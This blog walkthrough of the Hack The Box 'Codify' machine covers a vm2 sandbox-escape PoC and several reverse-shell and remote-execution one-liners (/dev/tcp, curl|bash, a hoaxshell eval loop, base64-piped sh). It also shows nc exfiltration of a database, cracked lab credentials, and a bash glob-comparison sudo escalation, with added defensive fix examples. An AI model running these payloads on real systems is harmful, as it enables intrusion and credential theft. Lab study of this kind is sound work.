Eureka's Studio.

Codify

2023/11/12

There may have been a lot of people hammering this box over the past few days; the network was laggy and threw all sorts of inexplicable errors.

Codify

Connection setup

Clash cannot run in global proxy mode here, only in rule mode. HTB boxes all redirect to a hostname, so a hosts entry has to be added.

#HTB
10.10.11.239 codify.htb

Enumeration

An nmap scan showed port 80 open (easy to guess even without scanning).

I admittedly approached this box like a CTF challenge at first. The idea is easy to guess: the site offers a place to test Node.js code. I had no leads initially, but once I noticed the Node.js sandbox I googled the keywords and found the most recent PoC.

const {VM} = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};

const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('touch pwned');
}
`

console.log(vm.run(code));

// Source: <https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244>

Trying SSH

/bin/bash -i >& /dev/tcp/10.10.16.43/443 0>&1

I replaced touch pwned with the command above to try for a reverse shell, but it did not seem to work. So I switched approach and used curl to pull the payload from my host instead.

curl 10.10.16.43 | bash

Villain > generate payload=linux/hoaxshell/sh_curl lhost=utun2
Generating backdoor payload...
nohup bash -c 's=10.10.16.43:8080&&i=593c8a-9cf9b9-b36a4c&&hname=$(hostname)&&p=http://;curl -s "$p$s/593c8a/$hname/$USER" -H "Authorization: $i" -o /dev/null&&while :; do c=$(curl -s "$p$s/9cf9b9" -H "Authorization: $i")&&if [ "$c" != None ]; then r=$(eval "$c" 2>&1)&&echo $r;if [ $r == byee ]; then pkill -P $$; else curl -s $p$s/b36a4c -X POST -H "Authorization: $i" -d "$r";echo $$;fi; fi; sleep 0.8; done;' & disown

Not sure whether the network was just in bad shape at the time, but this did not succeed either. Villain honestly has something going for it. Thinking about it later, I figured encoding the command might do the trick.

echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjQzLzQ0MyAwPiYx | base64 -d |  sh

Stranger still, that afternoon every space had to be typed two or three times before it registered. Base64-decoding the reverse shell one-liner directly did not seem to work either, so I used Villain's snippet instead and tried to establish the shell directly through Villain.

echo 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  | base64 -d |  sh

[Shell] Backdoor session established on 10.10.11.239
Villain > sessions

Session ID IP Address OS Type User Owner Status
-------------------- ------------ ------- ------------------- ----- ------
593c8a-9cf9b9-b36a4c 10.10.11.239 Linux Undefined@Undefined Self Active

Villain > shell 593c8a-9cf9b9-b36a4c

This session is unstable. Consider running a socket-based rshell process in it.
Interactive pseudo-shell activated.
Press Ctrl + C or type "exit" to deactivate.

Undefined@Undefined: id
uid=1001(svc) gid=1001(svc) groups=1001(svc)

The shell connected, but it is a crippled one: only ls -al works for looking around.

svc@codify: ls -al /var/www
total 20
drwxr-xr-x 5 root root 4096 Sep 12 17:40 .
drwxr-xr-x 13 root root 4096 Oct 31 07:57 ..
drwxr-xr-x 3 svc svc 4096 Sep 12 17:45 contact
drwxr-xr-x 4 svc svc 4096 Sep 12 17:46 editor
drwxr-xr-x 2 svc svc 4096 Apr 12 2023 html

There is a db file in the contact directory, which clearly warrants a closer look.

target: nc 10.10.16.43 443 < tickets.db
mac: nc -l 443 > tickets.db

Once downloaded, john can crack the username and password hash stored inside. With that, the user flag is in hand.

joshua:spongebob1

Privilege escalation

At this point I wanted to reuse the earlier SSH payload but could not. So check what privileges the current user has.

joshua@codify:~$ sudo -l
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.sh

mysql-backup.sh may be run as root, so let's take a look at it.

joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
    /usr/bin/echo "Password confirmed!"
else
    /usr/bin/echo "Password confirmation failed!"
    exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'

The script does indeed authenticate to MySQL as root, and the value the user types is neither filtered nor quoted. In the comparison [[ $DB_PASS == $USER_PASS ]] the right-hand side is unquoted, so bash treats the input as a glob pattern rather than a literal string. That property lets the check be probed blind, one character at a time.

joshua@codify:~$ echo "k*" | sudo /opt/scripts/mysql-backup.sh
[sudo] password for joshua:

Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions
Done!

joshua@codify:~$ echo "l*" | sudo /opt/scripts/mysql-backup.sh

Password confirmation failed!
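The following is an added example, not from the original writeup: it reproduces the script's unquoted comparison next to the one-character fix (quoting the right-hand side), using a constructed secret in place of /root/.creds, and measures how many single-character glob probes each variant accepts. It runs the comparison through an explicit bash invocation because [[ ]] is a bash feature.

```shell
#!/bin/sh
# Added example, not from the original writeup: the backup script's
# password check compared as a glob pattern, next to the quoted fix.

# Constructed stand-in for /root/.creds (not the box's real value).
SECRET='kljh12k3jhaskjh12kjh3'

# Mirrors the script: [[ $DB_PASS == $USER_PASS ]]. With the right-hand
# side unquoted, bash treats the typed value as a pattern, so "*" or
# "k*" match. Run under bash explicitly so this works from plain sh.
vulnerable_check() {
  bash -c '[[ $1 == $2 ]]' _ "$SECRET" "$1"
}

# Fix: quote the right-hand side, which makes [[ compare literal strings.
hardened_check() {
  bash -c '[[ $1 == "$2" ]]' _ "$SECRET" "$1"
}

# Leakage metric: how many "<char>*" probes over [a-z0-9] the check
# accepts. One accepted probe means the check confirms the first
# character of the secret; zero means it reveals nothing short of an
# exact match, which is the behaviour a password check should have.
count_accepted_prefix_probes() {
  checker=$1
  accepted=0
  for c in a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9; do
    if "$checker" "${c}*"; then
      accepted=$((accepted + 1))
    fi
  done
  echo "$accepted"
}

# Stand-alone run: prints 1 for the vulnerable check and 0 for the fix.
echo "vulnerable check accepts $(count_accepted_prefix_probes vulnerable_check) prefix probe(s)"
echo "hardened check accepts   $(count_accepted_prefix_probes hardened_check) prefix probe(s)"
```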

Of course, entering just a single * works too. After that, pspy64 can be used to watch processes on the box and pick up the root password from the mysqldump command line.

/usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 mysql
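An added example, not from the original writeup, showing why pspy64 could read that password: the argv of every process is readable by every local user through /proc/<pid>/cmdline, so -p"$DB_PASS" is exposed the moment mysqldump starts, whereas a password kept in a mode-600 option file passed via --defaults-extra-file never appears there. It uses a sleeping shell as a stand-in for mysqldump, a constructed credential, and assumes Linux (/proc present).

```shell
#!/bin/sh
# Added example, not from the original writeup: password in argv is
# world-visible via /proc; a mode-600 option file is not. Uses a sleeping
# sh as a stand-in for mysqldump so it runs offline. Assumes Linux.

# Constructed credential; not the value from the box.
FAKE_PASS='constructed-secret-not-real'

# argv of a live process, NUL separators turned into spaces.
cmdline_of() {
  tr '\0' ' ' < "/proc/$1/cmdline"
}

# Start a stand-in process with the given arguments; return 0 if the
# password string shows up in its argv, 1 otherwise. The trailing ':'
# stops the shell from exec-replacing itself with sleep, which would
# also replace the argv we want to inspect.
password_visible() {
  sh -c 'sleep 2; :' standin "$@" &
  pid=$!
  sleep 1   # let the child finish exec so we read its own argv
  argv=$(cmdline_of "$pid")
  kill "$pid" 2>/dev/null || true
  case "$argv" in
    *"$FAKE_PASS"*) return 0 ;;
    *) return 1 ;;
  esac
}

# The script's pattern: password inline in the command, as pspy saw it.
inline_password_leaks() {
  password_visible -u root -h 0.0.0.0 -P 3306 "-p$FAKE_PASS" mysql
}

# Safer pattern: password in a [client] option file readable only by the
# caller; only the file path is visible in argv.
option_file_leaks() {
  optfile=$(mktemp)
  chmod 600 "$optfile"
  printf '[client]\npassword=%s\n' "$FAKE_PASS" > "$optfile"
  if password_visible "--defaults-extra-file=$optfile" -u root mysql; then
    rc=0
  else
    rc=1
  fi
  rm -f "$optfile"
  return "$rc"
}

# Stand-alone run: "yes" for the inline form, "no" for the option file.
echo "inline -p password visible in argv: $(inline_password_leaks && echo yes || echo no)"
echo "option-file password visible in argv: $(option_file_leaks && echo yes || echo no)"
```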